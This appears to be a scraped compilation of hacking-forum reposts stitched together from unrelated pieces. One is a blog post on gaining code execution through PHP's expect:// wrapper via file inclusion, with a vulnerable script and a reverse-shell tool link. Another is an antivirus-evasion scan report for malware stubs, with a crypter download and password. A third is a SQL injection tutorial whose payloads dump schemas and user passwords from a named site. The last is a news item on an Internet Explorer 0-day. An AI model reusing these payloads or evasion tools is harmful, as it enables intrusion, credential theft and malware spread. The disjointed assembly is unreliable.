Leaderboard

This blog post covers a fascinating method of leveraging Local File Inclusion to gain Remote Code Execution on a vulnerable host. It has several downfalls, but overall is one of the more interesting methods I have found, and I have not found any references to it anywhere that I looked online. PHP has many “wrappers” to parse certain types of things. For example, the php://input or php://filter wrappers, which have been used in the past for both code execution and information disclosure – notably the PHP-CGI Arguement Injection exploit, which uses the php://input wrapper to inject code after making modifications to PHP.ini directives. One of the more entertaining ones I stumbled across is how PHP handles the expect:// “wrapper”. For those who do not know, “expect” is a program/scripting language of sorts that one can use to interact with other interactive programs. Some of you may be familiar with pexpect from Python, which is used to interact with SSH sessions for automation. It is a rather powerful utility, and is often used by sysadmins to automate procedures which would normally require human interaction. As it happens, amongst PHP’s many wrappers, there is an “expect://” wrapper. I stumbled across it by accident while looking up the correct way to use php://filter to read files via LFI (I will document that method later, it deserves a post of its own). I knew expect looked familiar, so when I looked more into it, I found examples of people using it in PHP scripts to automate things like ssh-ing to remote boxes, etc. After a while it dawned on me that something interesting might just happen if I passed expect://ls to an include() call in a PHP script, so I decided to see what would happen. I used the following vulnerable (to LFI) PHP script, and called test.php?hax=expect://ls <?php $code = $_GET['hax']; include($code); ?> It provided me with a directory listing of my webroot. After a few minutes of thinking “oh, this is interesting”, I decided to see if I could knock up an interactive shell in Python to automate the whole procedure. First off, I decided to see could I get it all to work out using Pythons “requests” module… Seeing as it worked, now it was time to write a “shell”. Yes, I now had a somewhat interactive “shell” on the vulnerable host (localhost…). I considered releasing the proof of concept right there, however further messing about was warranted first, obviously. I needed to see how far I could “push” this vuln, and how cool I could possibly make the PoC tool before releasing it to the wild, where someone would doubtlessly give me much abuse about my python So, without further ado, here is the video demo of it. It now checks if the host is vuln (very rudimentary check), and offers the “inline shell” or a reverse shell Download links at bottom // Err, the video is on its way, I did not have time to clean it up sadly. I will edit this post in a day or so with the finished video, I promise http://insecurety-research.googlecode.com/files/expectsh-0.3.py SURSA: http://insecurety.net/?p=724

Date and Time: 1/2/2013 1:12:39 PM File Name: stub.exe File Size: 90122 Bytes MD5: 6558bc1af532a664573dd98231ceb3c0 SHA1: dbe41cdc8807237882850949bcbcc054c1bfef72 Detection: 1 of 35 (3%) Status: INFECTED AVG Free - Clean! ArcaVir - Clean! Avast 5 - Clean! AntiVir (Avira) - TR/Crypt.XPACK.Gen BitDefender - Clean! VirusBuster Internet Security - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Vexira Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! Immunet Antivirus - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! VIPRE - Clean! Date and Time: 1/2/2013 2:15:11 PM File Name: spynet.exe File Size: 380518 Bytes MD5: 1a213dad5ed4d449e895468f47357c7e SHA1: 69f6c7974b90c94edcaa43128ec7754961a28adb Detection: 1 of 35 (3%) Status: INFECTED AVG Free - Clean! ArcaVir - Clean! Avast 5 - Clean! AntiVir (Avira) - TR/Dropper.Gen BitDefender - Clean! VirusBuster Internet Security - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Vexira Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! Immunet Antivirus - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! VIPRE - Clean! download : Download hip-hop crypter.rar from Sendspace.com - send big files the easy way pass: ARCHIVA : BASE - TRIPO - GILA . PASS : cgCJC8JYtdA0vA=eaAclDNJFEzYfA7GG edit: http://www.sendspace.com/file/hpggai pas: e acelasi, era urcat fara stub!

Aici aveti mai multe detali! Source : https://www.wifiprotector.com/ Descarcare directa https://www.wifiprotector.com/downlo...om&language=en

by ???Dan & DenJacker What we will be doing is using nested select statements, (subquerys), along with our own variable to bypass the 1024 character limit of group_concat. If you're new to sql, this might look a bit advanced. Just study the code, though. Using this, you can get all the info you need in 2 requests. First of, the database/table/columns. (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x) PoC: http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)--+ Of course, if magic_quotes is enabled you would need to bypass using quotations by using hex values, or using the char() function. View the source, and we see every single database/table/column accessible. Now, to grab information from the columns. (select (@) from (select (@x:=0x00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x) PoC: http://www.meandmypen.com/work.php?id=-181' UNION SELECT 1,2,3,4,5,(select(@) from (select (@:=0x00),(select (@) from (test.pp_users) where (@) in (@:=concat(@,0x0a,ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email))))a)--+ Sursa: TUTORIAL : [All DB In [1] Request]

[h=1]Exploited 0-day vulnerability in Internet Explorer discovered[/h] 02 January 2013 [h=2]At the very end of last year a new 0-day exploit against IE6, 7 and 8 was discovered in wild. Microsoft has released a temporary Fix-it pending a formal patch.[/h] The discovered attack appears to have been a water hole attack linked to the Elderwood project, using the Council on Foreign Relations (CFR) website. Water hole attacks first locate and compromise a site likely to be of interest to the intended targets, and then wait for those targets to come visiting. In this instance a 0-day vulnerability affecting Internet Explorer versions 6 to 8 was exploited to infect susceptible visitors. There is some suggestion that the targets include Chinese dissidents. Although the infected website is in New York, the exploit only triggers if the visiting browser is Chinese, Chinese (Taiwan), Japanese, Korean, or Russian. “The vulnerability present in Internet Explore 8 seems to be a user-after-free,” explains Jaime Blasco of AlienVault. “The exploit is able to exploit both Windows XP and Windows 7 bypassing both data execution (DEP) and address space layout randomization (ASLR) protections.” IE9 and 10 users are not vulnerable. If the exploit code is successful and a payload is implanted on the target, it attempts to connect to a C&C server that can download further malware. Although the discovered attack targeted a specific website, other users of the vulnerable IE versions should not ignore the threat. “There is now a Metasploit module (ie_cdwnbindinfo_uaf) that emulates this attack,” warns the Internet Storm Center, “meaning this will move in to mainstream exploitation rapidly, thus mitigation steps should be taken so soon as possible.” The best protection against exploits for this vulnerability, suggests Microsoft, is for the vulnerable code to not be present. Internet Explorer 9 or 10 do not include the vulnerable code. Where possible, then, the solution should be to upgrade to IE9 or IE10 as soon as possible. Where this is not possible – either through company policy or use of Windows XP which does not support IE9 or IE10 – users should apply the Microsoft Fix-it, or switch to a different browser. “If you are using IE9 or IE10, today is your lucky day, because you are not vulnerable to this. For those who are using older versions of IE such as 8 -- what's the matter with you?” comments sinn3r in the Rapid7 Metasploit blog. Microsoft has released a security advisory (2794220) with details of the vulnerability, and provided a Fix-it with details on how to implement it. Sursa: Infosecurity - Exploited 0-day vulnerability in Internet Explorer discovered